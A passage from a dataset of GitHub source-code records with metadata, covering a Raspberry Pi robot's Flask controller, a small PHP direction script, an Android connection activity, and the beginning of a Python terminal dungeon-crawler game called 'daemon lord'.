RPi_MSG_AUTO_MODE END ##############\n finally:\n lock.release()\n \n print(\"-----DUMP CONTEXT------\")\n print(\"-----SET RPI_DROID_COMMAND TYPE: \",\n ContextRPi.RPI_DROID_COMMAND_MSG_TYPE)\n print(\"-----SET RPI_DROID_COMMAND: DIRECTION: \",\n ContextRPi.RPI_DROID_DIRECTION)\n print(\"-----SET RPI_DROID_COMMAND: CONNECTED: \",\n ContextRPi.RPI_DRОID_CONNECTED)\n print(\"-----SET RPI_DROID_COMMAND: RPI_AUTO_MODE_ENABLED: \",\n ContextRPi.RPI_AUTO_MODE_ENABLED)\n print(\"-----SET RPI_DROID_COMMAND: RPI_RESPONSE: \",\n ContextRPi.RPI_RESPONSE)\n\n sResponse = json.dumps({\"response_status\": ContextRPi.getStringResponse(), \"aditional_info\": ContextRPi.aditionalResponseInfo}, sort_keys=False)\n print(sResponse)\n return sResponse\n\n try:\n app.run(debug=False, use_reloader=False, threaded=True, host='0.0.0.0')\n except Exception:\n print(\"Pokretanje flask aplikacije za komunikaciju neuspesno\")\n\n# ----------------------------MODUL ZA KOMUNIKACIJU END----------------------------\n\n# Klasa Context je deljeni resurs preko koje komuniciraju svi moduli\nclass Context:\n def __init__(self):\n self.RPI_DROID_COMMAND_MSG_TYPE = RPi_MSG_TYPE.RPi_MSG_INVALID\n self.RPI_DROID_DIRECTION = RPi_DIRECTION.RPi_INVALID\n self.RPI_DRОID_CONNECTED = False\n self.RPI_AUTO_MODE_ENABLED = RPi_AUTO_MODE.RPi_AUTO_MODE_INVALID\n self.RPI_RESPONSE = RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_INVALID\n self.aditionalResponseInfo = \"\"\n self.prevSide = RPi_SIDE.RPi_SIDE_INVALID\n self.threadControlGPIO = Thread(target=ControlGPIO, args=())\n self.threadBUG = Thread(target=BUGAlgorithm, args=())\n\n def update_context_direction(self, msg_type, direction):\n print(\"update_context_direction called\")\n self.RPI_DROID_COMMAND_MSG_TYPE = msg_type\n self.RPI_DROID_DIRECTION = direction\n\n def update_context_conn(self, conn):\n print(\"update_context_direction called\")\n self.RPI_DRОID_CONNECTED = conn\n \n def update_context_auto_mode(self, am):\n print(\"update_context_conn called\")\n self.RPI_AUTO_MODE_ENABLED = am\n \n def update_context_response(self, response):\n print(\"update_context_response called\")\n self.RPI_RESPONSE = response\n \n def update_context_aditional_info(self, ad_info):\n print(\"update_context_aditional_info called\")\n self.aditionalResponseInfo = ad_info\n \n def update_context_prev_side(self, prev):\n print(\"update_context_prev_side called\")\n self.prevSide = prev\n \n def get_current_msg_type(self):\n print(\"get_current_msg_type called\")\n return self.RPI_DROID_COMMAND_MSG_TYPE\n\n def get_current_direction(self):\n print(\"get_current_direction called\")\n return self.RPI_DROID_DIRECTION\n \n def get_connection(self):\n print(\"get_connection called\")\n return self.RPI_DRОID_CONNECTED\n \n def get_auto_mode(self):\n print(\"get_auto_mode called\")\n return self.RPI_AUTO_MODE_ENABLED\n \n def get_curr_response(self):\n print(\"get_curr_response called\")\n return self.RPI_RESPONSE\n \n def get_aditional_indo(self):\n print(\"get_aditional_indo called\")\n return self.aditionalResponseInfo\n \n def get_prev_side(self):\n print(\"get_prev_side called\")\n return self.prevSide\n \n def getStringResponse(self):\n \n response = \"\"\n \n if self.RPI_RESPONSE == RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_INVALID or self.RPI_RESPONSE == RPi_RESPONSE_OBSTRACLE.RPi_FAILURE:\n response = \"FAILURE\"\n elif self.RPI_RESPONSE == RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK:\n response = \"OK\"\n elif self.RPI_RESPONSE == RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_DETECTED:\n response = \"OBSTRACLE_DETECTED\"\n elif self.RPI_RESPONSE == RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_PASSED:\n response = \"OBSTRACLE_PASSED\"\n else:\n response = \"UNDEFINED\"\n\n return response\n \n# Azuriranje i citanje vrednosti iz objekta klase Context se stiti ovim mutexom\nlock = threading.Lock()\nContextRPi = Context()\n\nif __name__ == '__main__':\n # Potrebno je koristiti 0.0.0.0 u app.run da bi web server\n # bio dostupan bilo kom uredjaju u istoj mrezi\n print(\"pokrenuta aplikacija\")\n # _thread.start_new_thread(ControlGPIO,())\n # tid = _thread.start_new_thread(FlaskApplication, ())\n\n # t1.join()\n # t1 = Thread(target=ControlGPIO, args=())\n # t1.start()\n\n # t = Thread(target=FlaskApplication, args=())\n # t.start()\n # t.join()\n FlaskApplication()\n\n # t1.join()" }, { "alpha_fraction": 0.6071428656578064, "alphanum_fraction": 0.6071428656578064, "avg_line_length": 19.14285659790039, "blob_id": "d137ed6ebeb34ed48ceb38c53f614f945b9179ee", "content_id": "114876e532a86ce43e3a23ba7e3c8050ce191606", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 140, "license_type": "no_license", "max_line_length": 64, "num_lines": 7, "path": "/Web application - test/master_web_app/direction_right_service.php", "repo_name": "nenadlazic/RPiRobot", "src_encoding": "UTF-8", "text": "<?php\n$myfile = fopen(\"test.php\", \"w\") or die(\"Unable to open file!\");\n$txt = \"right\";\nfwrite($myfile, $txt);\necho $txt;\nfclose($myfile);\n?>" }, { "alpha_fraction": 0.5717625617980957, "alphanum_fraction": 0.5751168727874756, "avg_line_length": 37.73228454589844, "blob_id": "ab501aaab4788a94f4f3f886af736615c62f929e", "content_id": "d2ecc11a64da5b5cae4405c3c6dcada4b57492a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 9838, "license_type": "no_license", "max_line_length": 144, "num_lines": 254, "path": "/Android application/rpidroid_robot/app/src/main/java/matf/beograd/master/nenadlazic/rpidroid_robot/IpActivity.java", "repo_name": "nenadlazic/RPiRobot", "src_encoding": "UTF-8", "text": "/**\n * Created by nlazic on 12/25/2017.\n */\npackage matf.beograd.master.nenadlazic.rpidroid_robot;\n\nimport android.content.Context;\nimport android.graphics.drawable.AnimationDrawable;\nimport android.support.v7.app.AppCompatActivity;\nimport android.os.Bundle;\nimport android.view.View;\nimport android.widget.Button;\nimport android.widget.EditText;\nimport android.widget.ImageView;\nimport android.content.SharedPreferences;\nimport android.os.Handler;\nimport android.content.Intent;\n\n//VOLLEY work ok***********************************************************************************\n//import com.android.volley.Request;\n//import com.android.volley.Response;\n//import com.android.volley.VolleyError;\n//import com.android.volley.toolbox.StringRequest;\n//************************************************************************************************\n\n\npublic class IpActivity extends AppCompatActivity {\n\n //Handlers for loading animation during connecting\n AnimationDrawable animation;\n ImageView loading;\n\n //Handler for connection button\n Button btnConnect;\n //Handlers for field IP address\n EditText editText;\n\n //Volley handler which will be used throughout the life cycle of the application\n //SingletonVolley volleyHandler;\n\n private boolean connected;\n\n\n @Override\n protected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n setContentView(R.layout.activity_ip);\n\n //Prepare loading animation\n loading = (ImageView) findViewById(R.id.imageView2);\n animation = (AnimationDrawable) loading.getDrawable();\n\n //Get handlers for UI components\n btnConnect = (Button) findViewById(R.id.button_ip);\n editText = (EditText) findViewById(R.id.edit_ip);\n\n connected = false;\n\n String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n Utils.RPiToastLog(nameMethod, getApplicationContext());\n Utils.RPiAndroidLog(nameMethod);\n\n }\n\n @Override\n protected void onStart() {\n super.onStart();\n\n String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n Utils.RPiToastLog(nameMethod, getApplicationContext());\n Utils.RPiAndroidLog(nameMethod);\n }\n\n @Override\n protected void onResume() {\n super.onResume();\n\n String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n Utils.RPiToastLog(nameMethod, getApplicationContext());\n Utils.RPiAndroidLog(nameMethod);\n }\n\n @Override\n protected void onPause() {\n super.onPause();\n\n String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n Utils.RPiToastLog(nameMethod, getApplicationContext());\n Utils.RPiAndroidLog(nameMethod);\n }\n\n @Override\n protected void onStop() {\n super.onStop();\n\n String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n Utils.RPiToastLog(nameMethod, getApplicationContext());\n Utils.RPiAndroidLog(nameMethod);\n }\n\n @Override\n protected void onRestart() {\n super.onRestart();\n\n String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n Utils.RPiToastLog(nameMethod, getApplicationContext());\n Utils.RPiAndroidLog(nameMethod);\n\n if(connected == true){\n final Handler handler = new Handler();\n handler.postDelayed(new Runnable() {\n @Override\n public void run() {\n //Do something after 3s\n //sent intent\n Intent intent = new Intent(getApplicationContext(), AllegationsRobot.class);\n startActivity(intent);\n }\n }, 3000);\n }\n }\n\n @Override\n protected void onDestroy() {\n super.onDestroy();\n\n String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n Utils.RPiToastLog(nameMethod, getApplicationContext());\n Utils.RPiAndroidLog(nameMethod);\n }\n\n //Connection button listener\n public void connectingStart(final View v) {\n //Check if the IP address field is correctly filled then create request and start animation\n final String sIpAddress = editText.getText().toString();\n if (Utils.isIpAddress(sIpAddress)) {\n startAnimation(v);\n btnConnect.setClickable(false);\n\n String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n Utils.RPiToastLog(nameMethod, getApplicationContext());\n Utils.RPiAndroidLog(nameMethod);\n\n HttpService httpService = new HttpService(getApplicationContext(), new Utils.OnResponseListener<String>() {\n @Override\n public void onSuccess(String object) {\n\n String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n Utils.RPiToastLog(object.toString(), getApplicationContext());\n Utils.RPiAndroidLog(nameMethod);\n connected = true;\n\n stopAnimation(v, Utils.HttpResponseCode.RPi_HTTP_OK);\n\n\n //Save ip address in shared prefference\n SharedPreferences settings = getSharedPreferences(GlobalContextApplication.IP_ADDRESS_PREFS_NAME, Context.MODE_PRIVATE);\n SharedPreferences.Editor editor = getSharedPreferences(GlobalContextApplication.IP_ADDRESS_PREFS_NAME, MODE_PRIVATE).edit();\n editor.putString(GlobalContextApplication.mPrefsName, sIpAddress);\n editor.putInt(\"something\",1);\n editor.apply();\n\n //TODO use in another activity\n //Read ip address from shared pref\n SharedPreferences prefs = getSharedPreferences(GlobalContextApplication.IP_ADDRESS_PREFS_NAME, MODE_PRIVATE);\n String sIpAdRestore = prefs.getString(GlobalContextApplication.mPrefsName,\"default_return_value\");\n Utils.RPiAndroidLog(\"From shared pref: \"+sIpAddress);\n Utils.RPiToastLog(sIpAddress,getApplicationContext());\n\n //TODO intent for new activity\n final Handler handler = new Handler();\n handler.postDelayed(new Runnable() {\n @Override\n public void run() {\n //Do something after 100ms\n //sent intent\n Intent intent = new Intent(getApplicationContext(), AllegationsRobot.class);\n startActivity(intent);\n }\n }, 3000);\n }\n\n @Override\n public void onFailure(Exception e) {\n editText.setText(\"exception\");\n\n String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n Utils.RPiToastLog(nameMethod, getApplicationContext());\n Utils.RPiAndroidLog(nameMethod);\n\n stopAnimation(v, Utils.HttpResponseCode.RPi_UNDEFINED);\n btnConnect.setClickable(true);\n }\n }, sIpAddress,\"connecting\", Utils.MessageType.RPi_MSG_CONNECTING);\n\n httpService.execute();\n } else {\n stopAnimation(v, Utils.HttpResponseCode.RPi_UNDEFINED);\n }\n }\n\n //Starting loading animation\n public void startAnimation(View v) {\n int retVisibility = loading.getVisibility();\n if(retVisibility != View.VISIBLE) {\n loading.setVisibility(View.VISIBLE);\n } else {\n loading.setImageResource(R.drawable.loading);\n animation = (AnimationDrawable) loading.getDrawable();\n }\n animation.start();\n }\n\n //Stopping loading animation\n public void stopAnimation(View v, Utils.HttpResponseCode response) {\n int retVisibility = loading.getVisibility();\n if(retVisibility != View.VISIBLE) {\n loading.setVisibility(View.VISIBLE);\n }\n\n animation.stop();\n if (response == Utils.HttpResponseCode.RPi_HTTP_OK) {\n loading.setImageResource(R.drawable.ok_img);\n } else {\n loading.setImageResource(R.drawable.notok_img);\n }\n }\n}\n\n\n//VOLLEY work ok***********************************************************************************\n// volleyHandler = new SingletonVolley(getApplicationContext());\n// String mUrlString = \"192.168.1.102\";\n// // Initialize a new StringRequest\n// StringRequest stringRequest = new StringRequest(\n// Request.Method.GET,\n// mUrlString,\n// new Response.Listener<String>() {\n// @Override\n// public void onResponse(String response) {\n// // Do something with response string\n// //editText.setText(response.toString());\n// stopAnimation(v, Utils.HttpResponseCode.RPi_HTTP_OK);\n// }\n// },\n// new Response.ErrorListener() {\n// @Override\n// public void onErrorResponse(VolleyError error) {\n// // Do something when get error\n// //Snackbar.make(mCLayout, \"Error...\", Snackbar.LENGTH_LONG).show();\n// }\n// }\n// );\n// volleyHandler.addToRequestQueue(stringRequest);\n//*************************************************************************************************\n" } ]
6
Kuiteland/daemonlord
https://github.com/Kuiteland/daemonlord
94fea68a0cc0d0803ba7fe4bcf57ba4cce22dcc4
095b9bb9dbcfeb8533cb3a0e2eaad5c67e19df9a
3ad088e19fa8dc0ec82fd9c39165042950d74776
refs/heads/main
2023-04-07T04:13:25.137325
2021-04-22T00:49:40
2021-04-22T00:49:40
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.44780054688453674, "alphanum_fraction": 0.46292445063591003, "avg_line_length": 36.05898666381836, "blob_id": "9fe3f35f08305837732f4b88398eafb734aac973", "content_id": "3377c9e7c074d3718ed4788d9f295a73bb7f8436", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 186592, "license_type": "permissive", "max_line_length": 342, "num_lines": 5035, "path": "/dl.py", "repo_name": "Kuiteland/daemonlord", "src_encoding": "UTF-8", "text": "import pickle\nimport re\nimport textwrap\nimport time\nimport random\nimport os\nimport sys\nimport struct\nimport tty\nfrom enum import Enum\nimport fcntl\nimport json\nimport csv\nfrom operator import itemgetter, attrgetter\nimport itertools\nimport collections\nif os.name == 'nt':\n import msvcrt # Windows\n os_windows = True\nelse:\n import termios # Mac & Linux\n os_windows = False\n\nconfig = {\n 'debug': False,\n}\n\n\nclass Job(Enum):\n FIGHTER, MAGE, PRIEST, THIEF, BISHOP, SAMURAI, LORD, NINJA, UNEMPLOYED = range(\n 9)\n\n\nclass Race(Enum):\n HUMAN, ELF, DWARF, GNOME, HOBBIT = range(5)\n\n\nclass State(Enum):\n OK, ASLEEP, PARALYZED, STONED, DEAD, ASHED, LOST = range(7)\n\n\nclass Align(Enum):\n GOOD, NEUTRAL, EVIL = range(3)\n\n\nclass Place(Enum):\n MAZE, EDGE_OF_TOWN, TRAINING_GROUNDS, CASTLE, HAWTHORNE_TAVERN, TRADER_JAYS, LAKEHOUSE_INN, MGH, CAMP, BATTLE, LEAVE_GAME = range(\n 11)\n\n\nclass Trap(Enum):\n TRAPLESS_CHEST, POISON_NEEDLE, CROSSBOW_BOLT, GAS_BOMB, STUNNER, EXPLODING_BOX, TELEPORTER, MAGE_BLASTER, PRIEST_BLASTER, ALARM = range(\n 10)\n\n\nclass Eventid(Enum):\n RNDMSG, KEY, BOSS = range(\n 3)\n\n\nclass Evloctype(Enum):\n RANDOM, DOWNSTAIRS = range(2)\n\n\nrace_status = {\n Race.HUMAN: (8, 8, 5, 8, 8, 9),\n Race.ELF: (7, 10, 10, 6, 9, 6),\n Race.DWARF: (10, 7, 10, 10, 5, 6),\n Race.GNOME: (7, 7, 10, 8, 10, 7),\n Race.HOBBIT: (5, 7, 7, 6, 10, 15),\n}\n\njob_requirements = {\n Job.FIGHTER: (11, 0, 0, 0, 0, 0, (True, True, True)),\n Job.MAGE: (0, 11, 0, 0, 0, 0, (True, True, True)),\n Job.PRIEST: (0, 0, 11, 0, 0, 0, (True, False, True)),\n Job.THIEF: (0, 0, 0, 0, 11, 0, (False, True, True)),\n Job.BISHOP: (0, 12, 12, 0, 0, 0, (True, False, True)),\n Job.SAMURAI: (15, 11, 10, 14, 10, 0, (True, True, False)),\n Job.NINJA: (15, 17, 15, 16, 15, 16, (False, False, True)),\n Job.LORD: (15, 12, 12, 15, 14, 15, (True, False, False)),\n}\n\nlevel_table = {\n Job.FIGHTER: (1000, 1724, 2972, 5124, 8834, 15231, 26260, 45275, 78060, 134586, 232044, 400075, 289709),\n Job.MAGE: (1100, 1896, 3268, 5634, 9713, 16746, 28872, 49779, 85825, 147974, 255127, 439874, 318529),\n Job.PRIEST: (1050, 1810, 3120, 5379, 9274, 15989, 27567, 47529, 81946, 141289, 243596, 419993, 304132),\n Job.THIEF: (900, 1551, 2674, 4610, 7948, 13703, 23625, 40732, 70227, 121081, 208760, 359931, 260326),\n Job.BISHOP: (1200, 2105, 3692, 6477, 11363, 19935, 34973, 61356, 107642, 188845, 331307, 581240, 438479),\n Job.SAMURAI: (1250, 2192, 3845, 6745, 11833, 20759, 36419, 63892, 112091, 196650, 345000, 605263, 456601),\n Job.LORD: (1300, 2280, 4000, 7017, 12310, 21596, 37887, 66468, 116610, 204578, 358908, 629663, 475008),\n Job.NINJA: (1450, 2543, 4461, 7829, 13729, 24085, 42254, 74179, 130050, 228157, 400275, 702236, 529756),\n}\n\nrandom_messages = [\n [\"You hear a loud noise from south.\",\n \"You wondered if monsters are fighting down there.\"],\n [\"You see a herd of mice.\",\n \"These mice are devoring a human-like figure.\",\n \"You noticed a pugent smell of blood.\"],\n [\"You've lost a sense of time since you came down to this dungeon.\",\n \"Is it still early afternoon? Or is it already late at night?\"],\n [\"It is hot and moist around this area.\",\n \"You've become very thirsty. Do we have sufficient water with us?\"],\n [\"You found a piece of paper.\",\n \"You read: 'Her name is Anna. She is dangerous. You must run away from her while you still can.'\"],\n [\"You saw a word 'Help!' carved on the wall.\",\n \"Probably you are way too late for the rescue.\"],\n [\"You saw scratches on the stone wall.\",\n \"Were these made with sharp claws of a monster?\"],\n [\"Look out!\",\n \"You almost caught in a deep pitfall.\",\n \"You saw some dead bodies and bones at the bottom.\"],\n [\"You found some words on the surface of a wooden board.\",\n \"'Please, more light, &%*&#'\"],\n [\"Watch out!\",\n \"An arrow flew from your left and hit the stone wall.\"],\n [\"You found a strange nutcracker.\",\n \"It started talking in a high piched voice.\",\n \"'You are doomed. Go back while you can.'\"],\n [\"You found someone's journal. On the last page, you read:\",\n \"'I would pay a millon gold if I could see sun light again.'\"],\n [\"You heard a voice in your head.\",\n \"'Do you know that this dungeon is a playground of the Lord?'\",\n \"'Do you think that you know what you are doing?'\"],\n [\"It's frigid in this area.\",\n \"Is there an icy monster around here?\"],\n [\"There should be other adventurers in this dungeon.\",\n \"You wondered why you don't see anyone else.\"],\n [\"You just wish you could stay in a better room tonight.\",\n \"You are fed up with cabbage soup for dinner.\"],\n [\"You find a message board saying:\",\n \"'From north west to south east. Just keep walking to south east, fool!'\"],\n [\"You heard a voice in your head:\",\n \"'You are penetrating the Lords territory.'\",\n \"'It will cost you your lives.'\"],\n]\n\n\nclass Vscr:\n \"\"\"\n Manage and control scroll window and virtual scroll windows\n \"\"\"\n\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self.vscr0 = bytearray(b'P'*width*height)\n self.vscr1 = bytearray(b'Q'*width*height)\n self.prev_vscr_view = memoryview(self.vscr0)\n self.cur_vscr_view = memoryview(self.vscr1)\n self.meswins = []\n\n def draw_map(self, party, floor_obj):\n \"\"\"\n Copy map data to a virtual scroll window\n \"\"\"\n floor_view = memoryview(floor_obj.floor_data)\n cv = self.cur_vscr_view\n w = self.width\n for cy in range(self.height):\n cv[cy*w:(cy+1)*w] = b'^'*w # fill with rocks\n my = party.y - (self.height-7)//2 + cy # convert cy to floor_y\n if 0 <= my < floor_obj.y_size:\n l_left = min(0, party.x-w//2) * -1\n l_right = min(w, floor_obj.x_size - party.x + w//2)\n map_left = my*floor_obj.x_size + party.x - w//2 + l_left\n map_right = map_left + l_right - l_left\n cv[cy*w+l_left:cy*w+l_right] = floor_view[map_left:map_right]\n if cy == (self.height-7)//2:\n cv[cy*w+w//2:cy*w+w//2+1] = b'@'\n\n def cls(self):\n \"\"\"\n clear both vscr0 and vscr1, and force clear screen\n \"\"\"\n self.cur_vscr_view[:] = b' ' * self.width * self.height\n self.prev_vscr_view[:] = b' ' * self.width * self.height\n self.display(force=True)\n\n def display(self, force=False):\n \"\"\"\n Actually print current virtual screen on the terminal and\n flip virtual screens for the next display.\n Caution: Do not call this method directly. Use disp_scrwin() instead.\n \"\"\"\n cv = self.cur_vscr_view\n w = self.width\n for y in range(self.height):\n slc = slice(y*w, (y+1)*w)\n if force == True or cv[slc] != self.prev_vscr_view[slc]:\n print(f\"\\033[{y+1};0H{cv[slc].tobytes().decode()}\", end='')\n self.cur_vscr_view, self.prev_vscr_view = \\\n self.prev_vscr_view, self.cur_vscr_view\n\n def draw_meswins(self):\n \"\"\"\n Display the message window\n \"\"\"\n for mw in self.meswins:\n meswidth = mw.width - 2\n if mw.frame:\n meswidth -= 4\n for y in range(mw.height):\n if len(mw.mes_lines) <= y:\n line = ' '*(meswidth)\n else:\n line = mw.mes_lines[y].ljust(meswidth)\n if mw.frame:\n line = ''.join(['| ', line, ' |'])\n line = line.encode()\n vscr_left = (mw.y+y)*self.width + mw.x\n self.cur_vscr_view[vscr_left:vscr_left+len(line)] = line\n\n def draw_partywin(self, party):\n \"\"\"\n Show the party window\n \"\"\"\n for y in range(7):\n line = \" # name class ac hp status \"\n width = len(line)\n if y != 0:\n if len(party.members) >= y:\n m = party.members[y-1]\n hpchar = ' '\n if m.hpplus > 0:\n hpchar = '+'\n elif m.hpplus < 0:\n hpchar = '-'\n alcls = ''.join([m.align.name[0], '-', m.job.name[:3]])\n ac = m.ac + party.ac\n if party.place == Place.BATTLE:\n ac += m.acplus\n if party.place == Place.BATTLE and \\\n m.state in [State.OK]:\n line = f\" {y} {m.name[:10].ljust(10)} {alcls} {ac:3d} {m.hp:4d}{hpchar}{m.action.ljust(13)}\"\n else:\n if m.poisoned and m.state == State.OK:\n line = f\" {y} {m.name[:10].ljust(10)} {alcls} {ac:3d} {m.hp:4d}{hpchar}{'POISONED'.ljust(13)}\"\n else:\n line = f\" {y} {m.name[:10].ljust(10)} {alcls} {ac:3d} {m.hp:4d}{hpchar}{m.state.name[:13].ljust(13)}\"\n else:\n line = f\" {y}\" + ' '*(width-2)\n line = line.encode()\n vscr_left = (self.height-7+y)*self.width\n self.cur_vscr_view[vscr_left:vscr_left+len(line)] = line\n\n def draw_header(self, party):\n \"\"\"\n Display the header info\n \"\"\"\n if party.gps:\n line = f\" daemon lord - dl - [{party.place.name.lower()}] floor:{party.floor:2d} ({party.x:3d}/{party.y:3d}) \"\n else:\n line = f\" daemon lord - dl - [{party.place.name.lower()}] floor:?? (???/???) \"\n if party.identify:\n line = line + \"<identify> \"\n if party.light_cnt:\n line = line + \"<light> \"\n self.cur_vscr_view[:len(line)] = line.encode()\n\n def disp_scrwin(self, floor_obj=None):\n \"\"\"\n Display scroll window main\n \"\"\"\n game = self.game\n start = time.time()\n party = game.party\n if not floor_obj:\n floor_obj = party.floor_obj\n view_range = 1\n if party.light_cnt > 0:\n view_range = 2\n if party.place == Place.MAZE or party.place == Place.CAMP:\n for y in range(party.y-view_range, party.y+view_range+1):\n for x in range(party.x-view_range, party.x+view_range+1):\n floor_obj.put_tile(\n x, y, floor_obj.get_tile(x, y), orig=False)\n self.draw_map(party, floor_obj)\n self.draw_partywin(party)\n self.draw_header(party)\n self.draw_meswins()\n self.display()\n delta = time.time() - start\n try:\n print(\n f\"\\033[{self.height};0H\", end='', flush=True)\n except:\n pass\n\n\nclass Meswin:\n \"\"\"\n Message window. A message line starts with \"* \".\n \"\"\"\n\n def __init__(self, vscr, x, y, width, height, frame=False):\n self.vscr = vscr\n self.width = min(width, vscr.width)\n self.height = min(height, vscr.height)\n self.x = x\n self.y = y\n self.cur_x = 0 # cursor position in message area\n self.cur_y = 0\n self.frame = frame\n self.show = False\n self.mes_lines = []\n self.cls()\n\n def change(self, x, y, width, height):\n \"\"\"\n Change size and position of message window\n \"\"\"\n self.x = x\n self.y = y\n self.width = min(width, self.vscr.width)\n self.height = min(height, self.vscr.height)\n\n def cls(self):\n # clear message area\n self.mes_lines = []\n\n def print(self, msg, start='*'):\n \"\"\"\n Print a message in the message window. Long text wraps\n to the next line. Process '\\n' in texts.\n \"\"\"\n meswidth = self.width - 2\n if self.frame:\n meswidth -= 5\n\n sublines = re.split('\\n', msg)\n for idx, sl in enumerate(sublines): # subline\n header = ' '\n if idx == 0:\n header = start + ' '\n ssls = textwrap.wrap(sl, width=meswidth-1)\n if len(ssls) == 0:\n self.mes_lines.append(header)\n else:\n for ssl in ssls:\n self.mes_lines.append(''.join([header, ssl]))\n header = ' '\n if len(self.mes_lines) > self.height:\n self.mes_lines = self.mes_lines[len(\n self.mes_lines)-self.height:]\n self.cur_y = len(self.mes_lines)-1\n self.show = True\n\n def input(self, msg):\n \"\"\"\n Input a string in the message window.\n \"\"\"\n self.print(msg)\n self.print('', start='>')\n # self.vscr.draw_meswins()\n # self.vscr.display()\n self.vscr.disp_scrwin()\n print(f\"\\033[{self.y+self.cur_y+1};{self.x+5}H\", end='', flush=True)\n try:\n value = input()\n self.mes_lines[self.cur_y] = \"> \" + value\n except:\n pass\n return value\n\n def input_char(self, msg, values=[]):\n \"\"\"\n Input a character in the message window.\n \"\"\"\n ch = ''\n while ch not in values:\n self.print(msg+' >', start=' ')\n self.vscr.disp_scrwin()\n print(f\"\\033[{self.y+self.cur_y+1};{self.x+len(msg)+8}H\",\n end='', flush=True)\n ch = getch()\n l = self.mes_lines.pop()\n self.print(''.join([l, ' ', ch])[2:], start=' ')\n self.vscr.disp_scrwin()\n if not values:\n break\n return ch\n\n\nclass Game:\n def __init__(self):\n self.characters = [] # registerd characters\n self.hospitalized = [] # members in the hospital\n self.party = None\n self.vscr = None\n self.dungeon = None\n self.spell = None\n self.battle = None\n\n def save(self):\n \"\"\"\n Save game status for later resume. If saved in dungeon,\n it saves floor objects as well. As pickling party object\n resulted in an error (memoryview can't be pickled), convert\n it to a tuple first. floor_obj has memoryview variable, too.\n \"\"\"\n self.savedata = []\n self.savedata.append(self.characters)\n\n p = self.party\n ptpl = (p.x, p.y, p.px, p.py, p.floor, p.pfloor,\n p.light_cnt, p.ac, p.gps, p.place, p.silenced, p.identify)\n self.savedata.append(ptpl)\n mems = [] # list of names\n for mem in self.party.members:\n mems.append(mem.name)\n self.savedata.append(mems)\n\n self.savedata.append(self.shopitems)\n\n if p.place in [Place.MAZE, Place.CAMP, Place.BATTLE]:\n self.savedata.append(self.dungeon.events)\n for f in self.dungeon.floors:\n ftpl = (f.x_size, f.y_size, f.floor, f.up_x, f.up_y,\n f.down_x, f.down_y, f.floor_data, f.floor_orig,\n f.rooms, f.battled, f.events)\n self.savedata.append(ftpl)\n self.savedata.append(None)\n with open('savedata.pickle', 'wb') as f:\n pickle.dump(self.savedata, f)\n\n def load(self):\n \"\"\"\n Load savedata.pickle to resume game.\n \"\"\"\n try:\n with open('savedata.pickle', 'rb') as f:\n self.savedata = pickle.load(f)\n except:\n return False\n self.characters = self.savedata.pop(0)\n\n ptup = self.savedata.pop(0)\n self.load_party(ptup)\n mems = self.savedata.pop(0)\n self.party.members = []\n for mem in mems:\n for ch in self.characters:\n if mem == ch.name:\n self.party.members.append(ch)\n\n self.shopitems = self.savedata.pop(0)\n\n if self.party.place not in [Place.MAZE, Place.CAMP, Place.BATTLE]:\n return\n\n self.dungeon.events = self.savedata.pop(0)\n self.dungeon.floors = []\n while True:\n ftpl = self.savedata.pop(0)\n if not ftpl:\n break\n x_size, y_size, floor, up_x, up_y, down_x, down_y, floor_data, floor_orig, rooms, battled, events = ftpl\n f = Floor(x_size, y_size, floor, floor_data)\n f.up_x, f.up_y = up_x, up_y\n f.down_x, f.down_y = down_x, down_y\n f.floor_orig = floor_orig\n f.floor_data = floor_data\n f.rooms = rooms\n f.battled = battled\n f.events = events\n self.dungeon.floors.append(f)\n self.party.floor_obj = self.dungeon.floors[self.party.floor-1]\n return True\n\n def load_party(self, ptup):\n p = self.party\n p.x, p.y, p.px, p.py, p.floor, p.pfloor, p.light_cnt, p.ac, p.gps, \\\n p.place, p.silenced, p.identify = ptup\n if p.place in [Place.MAZE, Place.CAMP, Place.BATTLE]:\n p.resumed = True # resume flag\n\n def load_monsterdef(self):\n \"\"\"\n load monster definition file\n As fellow monster in csv is wizname, convert to dl name\n \"\"\"\n Monster = collections.namedtuple(\n 'Monster', ['names', 'unident', 'unidents', 'type',\n 'level', 'hp', 'ac', 'attack', 'count', 'act',\n 'poison', 'paraly',\n 'stone', 'critical', 'drain', 'breathsp', 'heal',\n 'regdeathp', 'regfire', 'regcold', 'regpoison',\n 'regspellp', 'weakmaka', 'weaksleep', 'friendly',\n 'exp', 'number', 'floors', 'fellow', 'fellowp',\n 'agi', 'treasure'])\n Tmpmonster = collections.namedtuple(\n 'Tmpmonster', ['name', 'names', 'unident', 'unidents', 'type',\n 'level', 'hp', 'ac', 'attack', 'count', 'act1',\n 'act2', 'act3', 'act4', 'act5', 'poison', 'paraly',\n 'stone', 'critical', 'drain', 'breathsp', 'heal',\n 'regdeathp', 'regfire', 'regcold', 'regpoison',\n 'regspellp', 'weakmaka', 'weaksleep', 'friendly',\n 'exp', 'number', 'floors', 'fellowwiz', 'fellowp',\n 'agi', 'treasure'])\n with open('monsters.csv') as csvfile:\n rdr = csv.reader(csvfile)\n tmp_dic = {}\n for i, row in enumerate(rdr):\n if i == 0:\n continue\n try:\n level = int(row[7])\n except:\n level = 1\n try:\n ac = int(row[9])\n except:\n ac = 10\n try:\n count = int(row[11])\n except:\n count = 1\n poison = False\n if row[17].lower() == 'true':\n poison = True\n paraly = False\n if 